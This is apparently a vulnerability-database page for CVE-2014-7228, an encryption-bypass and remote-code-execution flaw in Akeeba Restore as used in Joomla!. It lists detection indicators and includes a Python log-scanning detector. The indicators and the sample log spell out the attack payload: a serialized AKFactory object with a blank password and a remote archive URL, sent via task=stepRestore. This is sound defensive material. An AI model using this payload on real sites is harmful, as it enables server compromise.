CVE-2014-7228
published 2014-11-03

Priority: P2 (70, high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 55.13% (98.9th percentile)
Akeeba Restore (restore.php), as used in Joomla! 2.5.4 through 2.5.25, 3.x through 3.2.5, and 3.3.0 through 3.3.4; Akeeba Backup for Joomla! Professional 3.0.0 through 4.0.2; Backup Professional for WordPress 1.0.b1 through 1.1.3; Solo 1.0.b1 through 1.1.2; Admin Tools Core and Professional 2.0.0 through 2.4.4; and CMS Update 1.0.a1 through 1.0.1, when performing a backup or update for an archive, does not delete parameters from $_GET and $_POST when it is cleansing $_REQUEST, but later accesses $_GET and $_POST using the getQueryParam function, which allows remote attackers to bypass encryption and execute arbitrary code via a command message that extracts a crafted archive.

Affected

[table: Vendor / Product / Version range / Fixed in; 45 ranges, 25 shown; only vendor "joomla" and product "joomla_!" are recoverable from the page, the affected versions are those listed in the description above]

Detection & IOCs (extracted from sources)

  • path: /administrator/components/com_joomlaupdate/restoration.php
  • path: /administrator/components/com_joomlaupdate/restore.php
  • command: task=stepRestore&factory=<base64-encoded-serialized-AKFactory>
  • other: O:9:"AKFactory":1:{s:18:"\x00AKFactory\x00varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:<len>:"<srv_uri>";}}
  • Monitor HTTP requests to /administrator/components/com_joomlaupdate/restore.php or restoration.php with GET parameters 'task=stepRestore' and 'factory=' (base64-encoded PHP serialized object), which are the attack vectors for this exploit.
  • Detect PHP unserialization of AKFactory objects via the 'factory' GET/POST parameter; the serialized payload contains the string 'AKFactory' and the keys 'kickstart.security.password' and 'kickstart.setup.sourcefile'.
  • Alert on HTTP 200 responses from restoration.php or restore.php during non-update periods; the exploit is only triggerable during a Joomla! CMS update, so requests to these endpoints outside of maintenance windows are highly suspicious.
  • Look for a crafted ZIP archive being fetched by the Joomla server from an attacker-controlled URL (the 'kickstart.setup.sourcefile' value in the serialized object), followed by a .php file being written and executed under /administrator/components/com_joomlaupdate/.
  • Detect modification of the 'currentPartNumber' field in the returned AKFactory serialized object from i:0 to i:-1, which is used to trigger the malicious archive extraction step.
  • The exploit bypasses encryption by setting 'kickstart.security.password' to an empty string in the serialized AKFactory object; detect requests where this parameter is blank alongside a remote sourcefile URL.
  • The vulnerability is only exploitable during an active Joomla! CMS update process; detection rules targeting restore.php/restoration.php will have a higher true-positive rate if scoped to non-maintenance windows.
  • The root cause is that $_GET and $_POST are not sanitized when $_REQUEST is cleansed, and getQueryParam later reads from them directly; WAF rules must block the 'factory' parameter in both GET and POST to be effective.
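To turn the indicators above into something a log pipeline can actually run, here is an added Python example (not from this database page, and not Akeeba or Joomla! code) that scans access-log lines for the request shape described: it decodes the 'factory' parameter and reports the AKFactory marker, the blank kickstart.security.password and a remote sourcefile URL, and separately flags POSTs to the endpoint and hits outside a maintenance window for follow-up. The log lines, the IP addresses and the decoded payload are constructed samples.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Constructed samples, not captured traffic: a decoded 'factory' value shaped like the IOC
# quoted above, and three Apache combined-format access-log lines built around it.
CONSTRUCTED_FACTORY = (
    'O:9:"AKFactory":1:{s:18:"\x00AKFactory\x00varlist";a:2:{s:27:"kickstart.security.password";s:0:"";'
    's:26:"kickstart.setup.sourcefile";s:34:"http://203.0.113.7/constructed.zip";}}'
)
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Nov/2014:10:01:02 +0000] "GET /administrator/components/com_joomlaupdate/restore.php'
    f'?task=stepRestore&factory={quote(base64.b64encode(CONSTRUCTED_FACTORY.encode()).decode())} HTTP/1.1" 200 512',
    '198.51.100.9 - - [03/Nov/2014:10:02:03 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 9210',
    '203.0.113.7 - - [03/Nov/2014:10:03:04 +0000] "POST /administrator/components/com_joomlaupdate/restoration.php HTTP/1.1" 200 300',
]

ENDPOINT_RE = re.compile(r"/administrator/components/com_joomlaupdate/(restore|restoration)\.php$")
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
SOURCEFILE_RE = re.compile(rb'"kickstart\.setup\.sourcefile";s:\d+:"(https?://[^"]+)"')


def classify_request(log_line: str, in_maintenance_window: bool = False) -> list[str]:
    """Return detection findings for one access-log line; an empty list means nothing to report."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    method, target = m.group("method"), urlsplit(m.group("target"))
    if not ENDPOINT_RE.search(target.path):
        return []
    findings = []
    if not in_maintenance_window:  # the vulnerable code path is only live during a CMS update
        findings.append("restore endpoint hit outside a CMS update window")
    if method == "POST":  # getQueryParam reads $_POST too, so the body needs the same inspection
        findings.append("POST to restore endpoint: inspect body for 'factory'")
    params = parse_qs(target.query)
    if params.get("task", [""])[0] == "stepRestore":
        findings.append("task=stepRestore")
    factory = params.get("factory", [""])[0]
    try:  # tolerate stripped '=' padding; anything that is not base64 simply yields no match
        blob = base64.b64decode(factory + "=" * (-len(factory) % 4))
    except ValueError:
        blob = b""
    if b"AKFactory" in blob:
        findings.append("serialized AKFactory object in 'factory'")
        if b'"kickstart.security.password";s:0:""' in blob:
            findings.append("empty kickstart.security.password (encryption bypass)")
        if sf := SOURCEFILE_RE.search(blob):
            findings.append("remote sourcefile " + sf.group(1).decode(errors="replace"))
    return findings
```

Web-server logs normally omit POST bodies, so the POST finding is a prompt to pull the body from a WAF or reverse-proxy capture rather than a verdict on its own.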